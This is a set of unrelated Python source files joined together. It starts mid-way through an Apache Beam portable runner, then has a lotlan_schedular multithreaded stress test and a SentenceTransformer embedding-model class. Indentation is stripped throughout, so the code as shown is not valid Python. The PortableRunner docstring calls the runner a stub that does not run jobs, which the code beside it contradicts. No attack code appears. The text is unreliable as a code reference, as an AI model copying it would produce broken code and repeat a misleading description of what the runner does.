# added unless they were specified by the user
add_arg_args = {'action': 'store', 'help': option.description}
if option.type == beam_job_api_pb2.PipelineOptionType.BOOLEAN:
add_arg_args['action'] = 'store_true' \
if option.default_value != 'true' else 'store_false'
elif option.type == beam_job_api_pb2.PipelineOptionType.INTEGER:
add_arg_args['type'] = int
elif option.type == beam_job_api_pb2.PipelineOptionType.ARRAY:
add_arg_args['action'] = 'append'
parser.add_argument("--%s" % option.name, **add_arg_args)
except Exception as e:
# ignore runner options that are already present
# only in this case is duplicate not treated as error
if 'conflicting option string' not in str(e):
raise
_LOGGER.debug("Runner option '%s' was already added" % option.name)
all_options = self.options.get_all_options(
add_extra_args_fn=add_runner_options,
retain_unknown_options=self._retain_unknown_options)
# TODO: Define URNs for options.
# convert int values: https://issues.apache.org/jira/browse/BEAM-5509
p_options = {
'beam:option:' + k + ':v1': (str(v) if type(v) == int else v)
for k,
v in all_options.items() if v is not None
}
return job_utils.dict_to_struct(p_options)
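  # For illustration of the mapping in get_pipeline_options() above: an option
  # such as num_workers=4 becomes the struct entry
  # 'beam:option:num_workers:v1' -> '4' (int values are stringified).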
def prepare(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> beam_job_api_pb2.PrepareJobResponse
"""Prepare the job on the job service"""
return self.job_service.Prepare(
beam_job_api_pb2.PrepareJobRequest(
job_name='job',
pipeline=proto_pipeline,
pipeline_options=self.get_pipeline_options()),
timeout=self.timeout)
def stage(self, pipeline, artifact_staging_endpoint, staging_session_token):
# type: (...) -> Optional[Any]
"""Stage artifacts"""
if artifact_staging_endpoint:
stager = portable_stager.PortableStager(
grpc.insecure_channel(artifact_staging_endpoint),
staging_session_token)
resources = []
for _, env in pipeline.components.environments.items():
for dep in env.dependencies:
if dep.type_urn != common_urns.artifact_types.FILE.urn:
raise RuntimeError('unsupported artifact type %s' % dep.type_urn)
if dep.role_urn != common_urns.artifact_roles.STAGING_TO.urn:
raise RuntimeError('unsupported role type %s' % dep.role_urn)
type_payload = beam_runner_api_pb2.ArtifactFilePayload.FromString(
dep.type_payload)
role_payload = \
beam_runner_api_pb2.ArtifactStagingToRolePayload.FromString(
dep.role_payload)
resources.append((type_payload.path, role_payload.staged_name))
stager.stage_job_resources(resources, staging_location='')
retrieval_token = stager.commit_manifest()
else:
retrieval_token = None
return retrieval_token
def run(self, preparation_id, retrieval_token):
# type: (str, str) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""Run the job"""
try:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=preparation_id),
timeout=self.timeout)
# If there's an error, we don't always get it until we try to read.
# Fortunately, there's always an immediate current state published.
state_stream = itertools.chain([next(state_stream)], state_stream)
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=preparation_id),
timeout=self.timeout)
except Exception:
# TODO(BEAM-6442): Unify preparation_id and job_id for all runners.
state_stream = message_stream = None
    # Run the job and wait for a result. We don't set a timeout here because
    # it may take a long time for a job to complete, and streaming
    # jobs currently never return a response.
run_response = self.job_service.Run(
beam_job_api_pb2.RunJobRequest(
preparation_id=preparation_id, retrieval_token=retrieval_token))
if state_stream is None:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=run_response.job_id))
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=run_response.job_id))
return run_response.job_id, message_stream, state_stream
class PortableRunner(runner.PipelineRunner):
"""
Experimental: No backward compatibility guaranteed.
A BeamRunner that executes Python pipelines via the Beam Job API.
This runner is a stub and does not run the actual job.
This runner schedules the job on a job service. The responsibility of
running and managing the job lies with the job service used.
"""
def __init__(self):
self._dockerized_job_server = None # type: Optional[job_server.JobServer]
@staticmethod
def _create_environment(options):
# type: (PipelineOptions) -> environments.Environment
portable_options = options.view_as(PortableOptions)
# Do not set a Runner. Otherwise this can cause problems in Java's
# PipelineOptions, i.e. ClassNotFoundException, if the corresponding Runner
# does not exist in the Java SDK. In portability, the entry point is clearly
# defined via the JobService.
portable_options.view_as(StandardOptions).runner = None
environment_type = portable_options.environment_type
if not environment_type:
environment_urn = common_urns.environments.DOCKER.urn
elif environment_type.startswith('beam:env:'):
environment_urn = environment_type
else:
# e.g. handle LOOPBACK -> EXTERNAL
environment_type = ENV_TYPE_ALIASES.get(
environment_type, environment_type)
try:
environment_urn = getattr(
common_urns.environments, environment_type).urn
except AttributeError:
raise ValueError('Unknown environment type: %s' % environment_type)
env_class = environments.Environment.get_env_cls_from_urn(environment_urn)
return env_class.from_options(portable_options)
def default_job_server(self, options):
# type: (PipelineOptions) -> job_server.JobServer
# TODO Provide a way to specify a container Docker URL
# https://issues.apache.org/jira/browse/BEAM-6328
if not self._dockerized_job_server:
self._dockerized_job_server = job_server.StopOnExitJobServer(
job_server.DockerizedJobServer())
return self._dockerized_job_server
def create_job_service_handle(self, job_service, options):
return JobServiceHandle(job_service, options)
def create_job_service(self, options):
# type: (PipelineOptions) -> JobServiceHandle
"""
Start the job service and return a `JobServiceHandle`
"""
job_endpoint = options.view_as(PortableOptions).job_endpoint
if job_endpoint:
if job_endpoint == 'embed':
server = job_server.EmbeddedJobServer()
else:
job_server_timeout = options.view_as(PortableOptions).job_server_timeout
server = job_server.ExternalJobServer(job_endpoint, job_server_timeout)
else:
server = self.default_job_server(options)
return self.create_job_service_handle(server.start(), options)
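  # job_endpoint resolution in create_job_service() above, summarized:
  # 'embed' -> in-process EmbeddedJobServer; any other value (e.g. a
  # 'localhost:8099' address) -> ExternalJobServer; no endpoint at all ->
  # the Dockerized default_job_server().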
@staticmethod
def get_proto_pipeline(pipeline, options):
# type: (Pipeline, PipelineOptions) -> beam_runner_api_pb2.Pipeline
portable_options = options.view_as(PortableOptions)
proto_pipeline = pipeline.to_runner_api(
default_environment=PortableRunner._create_environment(
portable_options))
# Some runners won't detect the GroupByKey transform unless it has no
# subtransforms. Remove all sub-transforms until BEAM-4605 is resolved.
for _, transform_proto in list(
proto_pipeline.components.transforms.items()):
if transform_proto.spec.urn == common_urns.primitives.GROUP_BY_KEY.urn:
for sub_transform in transform_proto.subtransforms:
del proto_pipeline.components.transforms[sub_transform]
del transform_proto.subtransforms[:]
# Preemptively apply combiner lifting, until all runners support it.
# These optimizations commute and are idempotent.
pre_optimize = options.view_as(DebugOptions).lookup_experiment(
'pre_optimize', 'lift_combiners').lower()
if not options.view_as(StandardOptions).streaming:
flink_known_urns = frozenset([
common_urns.composites.RESHUFFLE.urn,
common_urns.primitives.IMPULSE.urn,
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn
])
if pre_optimize == 'none':
pass
elif pre_optimize == 'all':
proto_pipeline = translations.optimize_pipeline(
proto_pipeline,
phases=[
translations.annotate_downstream_side_inputs,
translations.annotate_stateful_dofns_as_roots,
translations.fix_side_input_pcoll_coders,
translations.lift_combiners,
translations.expand_sdf,
translations.fix_flatten_coders,
# fn_api_runner_transforms.sink_flattens,
translations.greedily_fuse,
translations.read_to_impulse,
translations.extract_impulse_stages,
translations.remove_data_plane_ops,
translations.sort_stages
],
known_runner_urns=flink_known_urns)
else:
phases = []
for phase_name in pre_optimize.split(','):
# For now, these are all we allow.
          # Equality check: 'in' on a string would match any substring, e.g. 'lift'.
          if phase_name == 'lift_combiners':
phases.append(getattr(translations, phase_name))
else:
raise ValueError(
'Unknown or inapplicable phase for pre_optimize: %s' %
phase_name)
proto_pipeline = translations.optimize_pipeline(
proto_pipeline,
phases=phases,
known_runner_urns=flink_known_urns,
partial=True)
return proto_pipeline
def run_pipeline(self, pipeline, options):
# type: (Pipeline, PipelineOptions) -> PipelineResult
portable_options = options.view_as(PortableOptions)
# TODO: https://issues.apache.org/jira/browse/BEAM-5525
# portable runner specific default
if options.view_as(SetupOptions).sdk_location == 'default':
options.view_as(SetupOptions).sdk_location = 'container'
# This is needed as we start a worker server if one is requested
# but none is provided.
if portable_options.environment_type == 'LOOPBACK':
use_loopback_process_worker = options.view_as(
DebugOptions).lookup_experiment('use_loopback_process_worker', False)
portable_options.environment_config, server = (
worker_pool_main.BeamFnExternalWorkerPoolServicer.start(
state_cache_size=sdk_worker_main._get_state_cache_size(options),
data_buffer_time_limit_ms=
sdk_worker_main._get_data_buffer_time_limit_ms(options),
use_process=use_loopback_process_worker))
cleanup_callbacks = [functools.partial(server.stop, 1)]
else:
cleanup_callbacks = []
proto_pipeline = self.get_proto_pipeline(pipeline, options)
job_service_handle = self.create_job_service(options)
job_id, message_stream, state_stream = \
job_service_handle.submit(proto_pipeline)
result = PipelineResult(
job_service_handle.job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks)
if cleanup_callbacks:
# We wait here to ensure that we run the cleanup callbacks.
logging.info(
'Waiting until the pipeline has finished because the '
'environment "%s" has started a component necessary for the '
'execution.',
portable_options.environment_type)
result.wait_until_finish()
return result
class PortableMetrics(metric.MetricResults):
def __init__(self, job_metrics_response):
metrics = job_metrics_response.metrics
self.attempted = portable_metrics.from_monitoring_infos(metrics.attempted)
self.committed = portable_metrics.from_monitoring_infos(metrics.committed)
@staticmethod
def _combine(committed, attempted, filter):
all_keys = set(committed.keys()) | set(attempted.keys())
return [
MetricResult(key, committed.get(key), attempted.get(key))
for key in all_keys if metric.MetricResults.matches(filter, key)
]
def query(self, filter=None):
counters, distributions, gauges = [
self._combine(x, y, filter)
for x, y in zip(self.committed, self.attempted)
]
return {
self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges
}
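# Usage sketch (MetricsFilter lives in apache_beam.metrics.metric):
#   from apache_beam.metrics.metric import MetricsFilter
#   metrics = result.metrics().query(MetricsFilter().with_name('my_counter'))
#   counters = metrics[PortableMetrics.COUNTERS]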
class PipelineResult(runner.PipelineResult):
def __init__(
self,
job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks=()):
super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
self._job_service = job_service
self._job_id = job_id
self._messages = []
self._message_stream = message_stream
self._state_stream = state_stream
self._cleanup_callbacks = cleanup_callbacks
self._metrics = None
def cancel(self):
try:
self._job_service.Cancel(
beam_job_api_pb2.CancelJobRequest(job_id=self._job_id))
finally:
self._cleanup()
@property
def state(self):
runner_api_state = self._job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
return self._state
@staticmethod
def _runner_api_state_to_pipeline_state(runner_api_state):
return getattr(
runner.PipelineState,
beam_job_api_pb2.JobState.Enum.Name(runner_api_state))
@staticmethod
def _pipeline_state_to_runner_api_state(pipeline_state):
return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)
def metrics(self):
if not self._metrics:
job_metrics_response = self._job_service.GetJobMetrics(
beam_job_api_pb2.GetJobMetricsRequest(job_id=self._job_id))
self._metrics = PortableMetrics(job_metrics_response)
return self._metrics
def _last_error_message(self):
# Filter only messages with the "message_response" and error messages.
messages = [
m.message_response for m in self._messages
if m.HasField('message_response')
]
error_messages = [
m for m in messages
if m.importance == beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR
]
if error_messages:
return error_messages[-1].message_text
else:
return 'unknown error'
def wait_until_finish(self):
def read_messages():
previous_state = -1
for message in self._message_stream:
if message.HasField('message_response'):
logging.log(
MESSAGE_LOG_LEVELS[message.message_response.importance],
"%s",
message.message_response.message_text)
else:
current_state = message.state_response.state
if current_state != previous_state:
_LOGGER.info(
"Job state changed to %s",
self._runner_api_state_to_pipeline_state(current_state))
previous_state = current_state
self._messages.append(message)
t = threading.Thread(target=read_messages, name='wait_until_finish_read')
t.daemon = True
t.start()
try:
for state_response in self._state_stream:
self._state = self._runner_api_state_to_pipeline_state(
state_response.state)
if state_response.state in TERMINAL_STATES:
# Wait for any last messages.
t.join(10)
break
if self._state != runner.PipelineState.DONE:
raise RuntimeError(
'Pipeline %s failed in state %s: %s' %
(self._job_id, self._state, self._last_error_message()))
return self._state
finally:
self._cleanup()
def _cleanup(self):
has_exception = None
for callback in self._cleanup_callbacks:
try:
callback()
except Exception:
has_exception = True
self._cleanup_callbacks = ()
if has_exception:
raise
|
stress_test.py | # standard libraries
import sys
import os
from os import walk
from os.path import splitext, join
import threading
import unittest
import time
# 3rd party packages
import xmlrunner
from snakes.nets import Marking, MultiSet
sys.path.append(os.path.abspath("../lotlan_schedular"))
# local sources
import lotlan_schedular.helpers as helpers
from lotlan_schedular.api.event import Event
from lotlan_schedular.schedular import LotlanSchedular
from lotlan_schedular.api.location import Location
from lotlan_schedular.logger.sqlite_logger import SQLiteLogger
from lotlan_schedular.defines import SQLCommands
# Uninstall any previously installed lotlan_schedular package
# so the current source tree is used instead of an old install
# (-y skips pip's confirmation prompt).
os.system("pip3 uninstall -y lotlan_schedular")
def test_simple_task():
f = open("etc/examples/Scheduling/001_simple_task.tl")
lotlan_logic = LotlanSchedular(f.read(), True)
material_flows = lotlan_logic.get_materialflows()
material_flow = material_flows[0]
material_flow.start()
material_flow.fire_event("0",Event("task_finished", "", "Boolean", value=True)) # should not be allowed
material_flow.fire_event("0", Event("to_done", "", "Boolean", value=True))
material_flow.fire_event("0", Event("moved_to_location", "", "Boolean", value=True))
material_flow.fire_event("0", Event("moved_to_location", "", "Boolean", value=True))
f.close()
def main():
    threads = []
num_threads = 500
for i in range(num_threads):
threads.append(threading.Thread(target=test_simple_task))
start = time.time()
for thread in threads:
thread.start()
for thread in threads:
thread.join()
end = time.time()
print("Runtime with {} threads: {} seconds".format(num_threads, end-start))
if __name__ == "__main__":
main()
|
SentenceTransformer.py | import json
import logging
import os
import shutil
import stat
from collections import OrderedDict
from typing import List, Dict, Tuple, Iterable, Type, Union, Callable, Optional
import requests
import numpy as np
from numpy import ndarray
import transformers
from huggingface_hub import HfApi, HfFolder, Repository, hf_hub_url, cached_download
import torch
from torch import nn, Tensor, device
from torch.optim import Optimizer
from torch.utils.data import DataLoader
import torch.multiprocessing as mp
from tqdm.autonotebook import trange
import math
import queue
import tempfile
from distutils.dir_util import copy_tree
from . import __MODEL_HUB_ORGANIZATION__
from .evaluation import SentenceEvaluator
from .util import import_from_string, batch_to_device, fullname, snapshot_download
from .models import Transformer, Pooling, Dense
from .model_card_templates import ModelCardTemplate
from . import __version__
logger = logging.getLogger(__name__)
class SentenceTransformer(nn.Sequential):
"""
    Loads or creates a SentenceTransformer model that can be used to map sentences / text to embeddings.
:param model_name_or_path: If it is a filepath on disc, it loads the model from that path. If it is not a path, it first tries to download a pre-trained SentenceTransformer model. If that fails, tries to construct a model from Huggingface models repository with that name.
:param modules: This parameter can be used to create custom SentenceTransformer models from scratch.
:param device: Device (like 'cuda' / 'cpu') that should be used for computation. If None, checks if a GPU can be used.
:param cache_folder: Path to store models
"""
def __init__(self, model_name_or_path: Optional[str] = None, modules: Optional[Iterable[nn.Module]] = None, device: Optional[str] = None, cache_folder: Optional[str] = None):
self._model_card_vars = {}
self._model_card_text = None
self._model_config = {}
if cache_folder is None:
cache_folder = os.getenv('SENTENCE_TRANSFORMERS_HOME')
if cache_folder is None:
try:
from torch.hub import _get_torch_home
torch_cache_home = _get_torch_home()
except ImportError:
torch_cache_home = os.path.expanduser(os.getenv('TORCH_HOME', os.path.join(os.getenv('XDG_CACHE_HOME', '~/.cache'), 'torch')))
cache_folder = os.path.join(torch_cache_home, 'sentence_transformers')
if model_name_or_path is not None and model_name_or_path != "":
logger.info("Load pretrained SentenceTransformer: {}".format(model_name_or_path))
#Old models that don't belong to any organization
basic_transformer_models = ['albert-base-v1', 'albert-base-v2', 'albert-large-v1', 'albert-large-v2', 'albert-xlarge-v1', 'albert-xlarge-v2', 'albert-xxlarge-v1', 'albert-xxlarge-v2', 'bert-base-cased-finetuned-mrpc', 'bert-base-cased', 'bert-base-chinese', 'bert-base-german-cased', 'bert-base-german-dbmdz-cased', 'bert-base-german-dbmdz-uncased', 'bert-base-multilingual-cased', 'bert-base-multilingual-uncased', 'bert-base-uncased', 'bert-large-cased-whole-word-masking-finetuned-squad', 'bert-large-cased-whole-word-masking', 'bert-large-cased', 'bert-large-uncased-whole-word-masking-finetuned-squad', 'bert-large-uncased-whole-word-masking', 'bert-large-uncased', 'camembert-base', 'ctrl', 'distilbert-base-cased-distilled-squad', 'distilbert-base-cased', 'distilbert-base-german-cased', 'distilbert-base-multilingual-cased', 'distilbert-base-uncased-distilled-squad', 'distilbert-base-uncased-finetuned-sst-2-english', 'distilbert-base-uncased', 'distilgpt2', 'distilroberta-base', 'gpt2-large', 'gpt2-medium', 'gpt2-xl', 'gpt2', 'openai-gpt', 'roberta-base-openai-detector', 'roberta-base', 'roberta-large-mnli', 'roberta-large-openai-detector', 'roberta-large', 't5-11b', 't5-3b', 't5-base', 't5-large', 't5-small', 'transfo-xl-wt103', 'xlm-clm-ende-1024', 'xlm-clm-enfr-1024', 'xlm-mlm-100-1280', 'xlm-mlm-17-1280', 'xlm-mlm-en-2048', 'xlm-mlm-ende-1024', 'xlm-mlm-enfr-1024', 'xlm-mlm-enro-1024', 'xlm-mlm-tlm-xnli15-1024', 'xlm-mlm-xnli15-1024', 'xlm-roberta-base', 'xlm-roberta-large-finetuned-conll02-dutch', 'xlm-roberta-large-finetuned-conll02-spanish', 'xlm-roberta-large-finetuned-conll03-english', 'xlm-roberta-large-finetuned-conll03-german', 'xlm-roberta-large', 'xlnet-base-cased', 'xlnet-large-cased']
if os.path.exists(model_name_or_path):
#Load from path
model_path = model_name_or_path
else:
#Not a path, load from hub
if '\\' in model_name_or_path or model_name_or_path.count('/') > 1:
raise ValueError("Path {} not found".format(model_name_or_path))
if '/' not in model_name_or_path and model_name_or_path.lower() not in basic_transformer_models:
# A model from sentence-transformers
model_name_or_path = __MODEL_HUB_ORGANIZATION__ + "/" + model_name_or_path
model_path = os.path.join(cache_folder, model_name_or_path.replace("/", "_"))
if not os.path.exists(model_path):
# Download from hub
model_path_tmp = snapshot_download(model_name_or_path,
cache_dir=cache_folder,
library_name='sentence-transformers',
library_version=__version__,
ignore_files=['flax_model.msgpack', 'rust_model.ot', 'tf_model.h5'])
os.rename(model_path_tmp, model_path)
if os.path.exists(os.path.join(model_path, 'modules.json')): #Load as SentenceTransformer model
modules = self._load_sbert_model(model_path)
else: #Load with AutoModel
modules = self._load_auto_model(model_path)
if modules is not None and not isinstance(modules, OrderedDict):
modules = OrderedDict([(str(idx), module) for idx, module in enumerate(modules)])
super().__init__(modules)
if device is None:
device = "cuda" if torch.cuda.is_available() else "cpu"
logger.info("Use pytorch device: {}".format(device))
self._target_device = torch.device(device)
def encode(self, sentences: Union[str, List[str]],
batch_size: int = 32,
show_progress_bar: bool = None,
output_value: str = 'sentence_embedding',
convert_to_numpy: bool = True,
convert_to_tensor: bool = False,
device: str = None,
normalize_embeddings: bool = False) -> Union[List[Tensor], ndarray, Tensor]:
"""
Computes sentence embeddings
:param sentences: the sentences to embed
:param batch_size: the batch size used for the computation
        :param show_progress_bar: Output a progress bar while encoding sentences
:param output_value: Default sentence_embedding, to get sentence embeddings. Can be set to token_embeddings to get wordpiece token embeddings.
:param convert_to_numpy: If true, the output is a list of numpy vectors. Else, it is a list of pytorch tensors.
:param convert_to_tensor: If true, you get one large tensor as return. Overwrites any setting from convert_to_numpy
:param device: Which torch.device to use for the computation
:param normalize_embeddings: If set to true, returned vectors will have length 1. In that case, the faster dot-product (util.dot_score) instead of cosine similarity can be used.
:return:
By default, a list of tensors is returned. If convert_to_tensor, a stacked tensor is returned. If convert_to_numpy, a numpy matrix is returned.
"""
self.eval()
if show_progress_bar is None:
show_progress_bar = (logger.getEffectiveLevel()==logging.INFO or logger.getEffectiveLevel()==logging.DEBUG)
if convert_to_tensor:
convert_to_numpy = False
if output_value == 'token_embeddings':
convert_to_tensor = False
convert_to_numpy = False
input_was_string = False
if isinstance(sentences, str) or not hasattr(sentences, '__len__'): #Cast an individual sentence to a list with length 1
sentences = [sentences]
input_was_string = True
if device is None:
device = self._target_device
self.to(device)
all_embeddings = []
length_sorted_idx = np.argsort([-self._text_length(sen) for sen in sentences])
sentences_sorted = [sentences[idx] for idx in length_sorted_idx]
for start_index in trange(0, len(sentences), batch_size, desc="Batches", disable=not show_progress_bar):
sentences_batch = sentences_sorted[start_index:start_index+batch_size]
features = self.tokenize(sentences_batch)
features = batch_to_device(features, device)
with torch.no_grad():
out_features = self.forward(features)
if output_value == 'token_embeddings':
embeddings = []
for token_emb, attention in zip(out_features[output_value], out_features['attention_mask']):
last_mask_id = len(attention)-1
while last_mask_id > 0 and attention[last_mask_id].item() == 0:
last_mask_id -= 1
embeddings.append(token_emb[0:last_mask_id+1])
else: #Sentence embeddings
embeddings = out_features[output_value]
embeddings = embeddings.detach()
if normalize_embeddings:
embeddings = torch.nn.functional.normalize(embeddings, p=2, dim=1)
# fixes for #522 and #487 to avoid oom problems on gpu with large datasets
if convert_to_numpy:
embeddings = embeddings.cpu()
all_embeddings.extend(embeddings)
all_embeddings = [all_embeddings[idx] for idx in np.argsort(length_sorted_idx)]
if convert_to_tensor:
all_embeddings = torch.stack(all_embeddings)
elif convert_to_numpy:
all_embeddings = np.asarray([emb.numpy() for emb in all_embeddings])
if input_was_string:
all_embeddings = all_embeddings[0]
return all_embeddings
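    # Usage sketch (the model name is illustrative):
    #   model = SentenceTransformer('paraphrase-MiniLM-L6-v2')
    #   embeddings = model.encode(['How are you?'], convert_to_numpy=True)
    #   print(embeddings.shape)  # -> (1, embedding_dim)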
def start_multi_process_pool(self, target_devices: List[str] = None):
"""
        Starts a multi-process pool to compute the encoding with several independent processes.
This method is recommended if you want to encode on multiple GPUs. It is advised
to start only one process per GPU. This method works together with encode_multi_process
:param target_devices: PyTorch target devices, e.g. cuda:0, cuda:1... If None, all available CUDA devices will be used
        :return: Returns a dict with the target processes, an input queue and an output queue.
"""
if target_devices is None:
if torch.cuda.is_available():
target_devices = ['cuda:{}'.format(i) for i in range(torch.cuda.device_count())]
else:
logger.info("CUDA is not available. Start 4 CPU worker")
target_devices = ['cpu']*4
logger.info("Start multi-process pool on devices: {}".format(', '.join(map(str, target_devices))))
ctx = mp.get_context('spawn')
input_queue = ctx.Queue()
output_queue = ctx.Queue()
processes = []
for cuda_id in target_devices:
p = ctx.Process(target=SentenceTransformer._encode_multi_process_worker, args=(cuda_id, self, input_queue, output_queue), daemon=True)
p.start()
processes.append(p)
return {'input': input_queue, 'output': output_queue, 'processes': processes}
@staticmethod
def stop_multi_process_pool(pool):
"""
Stops all processes started with start_multi_process_pool
"""
for p in pool['processes']:
p.terminate()
for p in pool['processes']:
p.join()
p.close()
pool['input'].close()
pool['output'].close()
def encode_multi_process(self, sentences: List[str], pool: Dict[str, object], batch_size: int = 32, chunk_size: int = None):
"""
        This method allows you to run encode() on multiple GPUs. The sentences are chunked into smaller packages
        and sent to individual processes, which encode them on the different GPUs. This method is only suitable
for encoding large sets of sentences
:param sentences: List of sentences
:param pool: A pool of workers started with SentenceTransformer.start_multi_process_pool
:param batch_size: Encode sentences with batch size
        :param chunk_size: Sentences are chunked and sent to the individual processes. If None, a sensible size is determined.
:return: Numpy matrix with all embeddings
"""
if chunk_size is None:
chunk_size = min(math.ceil(len(sentences) / len(pool["processes"]) / 10), 5000)
logger.info("Chunk data into packages of size {}".format(chunk_size))
input_queue = pool['input']
last_chunk_id = 0
chunk = []
for sentence in sentences:
chunk.append(sentence)
if len(chunk) >= chunk_size:
input_queue.put([last_chunk_id, batch_size, chunk])
last_chunk_id += 1
chunk = []
if len(chunk) > 0:
input_queue.put([last_chunk_id, batch_size, chunk])
last_chunk_id += 1
output_queue = pool['output']
results_list = sorted([output_queue.get() for _ in range(last_chunk_id)], key=lambda x: x[0])
embeddings = np.concatenate([result[1] for result in results_list])
return embeddings
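    # Typical pool lifecycle, as a sketch:
    #   pool = model.start_multi_process_pool()
    #   embeddings = model.encode_multi_process(sentences, pool)
    #   SentenceTransformer.stop_multi_process_pool(pool)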
@staticmethod
def _encode_multi_process_worker(target_device: str, model, input_queue, results_queue):
"""
Internal working process to encode sentences in multi-process setup
"""
while True:
try:
id, batch_size, sentences = input_queue.get()
embeddings = model.encode(sentences, device=target_device, show_progress_bar=False, convert_to_numpy=True, batch_size=batch_size)
results_queue.put([id, embeddings])
except queue.Empty:
break
def get_max_seq_length(self):
"""
        Returns the maximal sequence length that the model accepts as input. Longer inputs will be truncated
"""
if hasattr(self._first_module(), 'max_seq_length'):
return self._first_module().max_seq_length
return None
def tokenize(self, texts: Union[List[str], List[Dict], List[Tuple[str, str]]]):
"""
Tokenizes the texts
"""
return self._first_module().tokenize(texts)
def get_sentence_features(self, *features):
return self._first_module().get_sentence_features(*features)
def get_sentence_embedding_dimension(self):
for mod in reversed(self._modules.values()):
sent_embedding_dim_method = getattr(mod, "get_sentence_embedding_dimension", None)
if callable(sent_embedding_dim_method):
return sent_embedding_dim_method()
return None
def _first_module(self):
"""Returns the first module of this sequential embedder"""
return self._modules[next(iter(self._modules))]
def _last_module(self):
"""Returns the last module of this sequential embedder"""
return self._modules[next(reversed(self._modules))]
def save(self, path: str, model_name: Optional[str] = None, create_model_card: bool = True):
"""
Saves all elements for this seq. sentence embedder into different sub-folders
:param path: Path on disc
:param model_name: Optional model name
:param create_model_card: If True, create a README.md with basic information about this model
"""
if path is None:
return
os.makedirs(path, exist_ok=True)
logger.info("Save model to {}".format(path))
modules_config = []
#Save some model info
if '__version__' not in self._model_config:
self._model_config['__version__'] = {
'sentence_transformers': __version__,
'transformers': transformers.__version__,
'pytorch': torch.__version__,
}
with open(os.path.join(path, 'config_sentence_transformers.json'), 'w') as fOut:
json.dump(self._model_config, fOut, indent=2)
#Save modules
for idx, name in enumerate(self._modules):
module = self._modules[name]
if idx == 0 and isinstance(module, Transformer): #Save transformer model in the main folder
model_path = path + "/"
else:
model_path = os.path.join(path, str(idx)+"_"+type(module).__name__)
os.makedirs(model_path, exist_ok=True)
module.save(model_path)
modules_config.append({'idx': idx, 'name': name, 'path': os.path.basename(model_path), 'type': type(module).__module__})
with open(os.path.join(path, 'modules.json'), 'w') as fOut:
json.dump(modules_config, fOut, indent=2)
# Create model card
if create_model_card:
self._create_model_card(path, model_name)
def _create_model_card(self, path: str, model_name: Optional[str] = None):
"""
        Creates an automatic model card and stores it in the given path
"""
if self._model_card_text is not None and len(self._model_card_text) > 0:
model_card = self._model_card_text
else:
tags = ModelCardTemplate.__TAGS__.copy()
model_card = ModelCardTemplate.__MODEL_CARD__
if len(self._modules) == 2 and isinstance(self._first_module(), Transformer) and isinstance(self._last_module(), Pooling) and self._last_module().get_pooling_mode_str() in ['cls', 'max', 'mean']:
pooling_module = self._last_module()
pooling_mode = pooling_module.get_pooling_mode_str()
model_card = model_card.replace("{USAGE_TRANSFORMERS_SECTION}", ModelCardTemplate.__USAGE_TRANSFORMERS__)
pooling_fct_name, pooling_fct = ModelCardTemplate.model_card_get_pooling_function(pooling_mode)
model_card = model_card.replace("{POOLING_FUNCTION}", pooling_fct).replace("{POOLING_FUNCTION_NAME}", pooling_fct_name).replace("{POOLING_MODE}", pooling_mode)
tags.append('transformers')
# Print full model
model_card = model_card.replace("{FULL_MODEL_STR}", str(self))
# Add tags
model_card = model_card.replace("{TAGS}", "\n".join(["- "+t for t in tags]))
# Add dim info
self._model_card_vars["{NUM_DIMENSIONS}"] = self.get_sentence_embedding_dimension()
# Replace vars we created while using the model
for name, value in self._model_card_vars.items():
model_card = model_card.replace(name, str(value))
# Replace remaining vars with default values
for name, value in ModelCardTemplate.__DEFAULT_VARS__.items():
model_card = model_card.replace(name, str(value))
if model_name is not None:
model_card = model_card.replace("{MODEL_NAME}", model_name.strip())
with open(os.path.join(path, "README.md"), "w", encoding='utf8') as fOut:
fOut.write(model_card.strip())
def save_to_hub(self,
repo_name: str,
organization: Optional[str] = None,
private: Optional[bool] = None,
commit_message: str = "Add new SentenceTransformer model.",
local_model_path: Optional[str] = None,
exist_ok: bool = False,
replace_model_card: bool = False):
"""
Uploads all elements of this Sentence Transformer to a new HuggingFace Hub repository.
:param repo_name: Repository name for your model in the Hub.
:param organization: Organization in which you want to push your model or tokenizer (you must be a member of this organization).
        :param private: Set to true for hosting a private model
:param commit_message: Message to commit while pushing.
:param local_model_path: Path of the model locally. If set, this file path will be uploaded. Otherwise, the current model will be uploaded
:param exist_ok: If true, saving to an existing repository is OK. If false, saving only to a new repository is possible
:param replace_model_card: If true, replace an existing model card in the hub with the automatically created model card
:return: The url of the commit of your model in the given repository.
"""
token = HfFolder.get_token()
if token is None:
raise ValueError("You must login to the Hugging Face hub on this computer by typing `transformers-cli login`.")
if '/' in repo_name:
splits = repo_name.split('/', maxsplit=1)
if organization is None or organization == splits[0]:
organization = splits[0]
repo_name = splits[1]
else:
raise ValueError("You passed and invalid repository name: {}.".format(repo_name))
endpoint = "https://huggingface.co"
repo_url = HfApi(endpoint=endpoint).create_repo(
token,
repo_name,
organization=organization,
private=private,
repo_type=None,
exist_ok=exist_ok,
)
full_model_name = repo_url[len(endpoint)+1:].strip("/")
with tempfile.TemporaryDirectory() as tmp_dir:
# First create the repo (and clone its content if it's nonempty).
logging.info("Create repository and clone it if it exists")
repo = Repository(tmp_dir, clone_from=repo_url)
# If user provides local files, copy them.
if local_model_path:
copy_tree(local_model_path, tmp_dir)
else: # Else, save model directly into local repo.
create_model_card = replace_model_card or not os.path.exists(os.path.join(tmp_dir, 'README.md'))
self.save(tmp_dir, model_name=full_model_name, create_model_card=create_model_card)
            #Find files larger than 5 MB and track them with git-lfs
large_files = []
for root, dirs, files in os.walk(tmp_dir):
for filename in files:
file_path = os.path.join(root, filename)
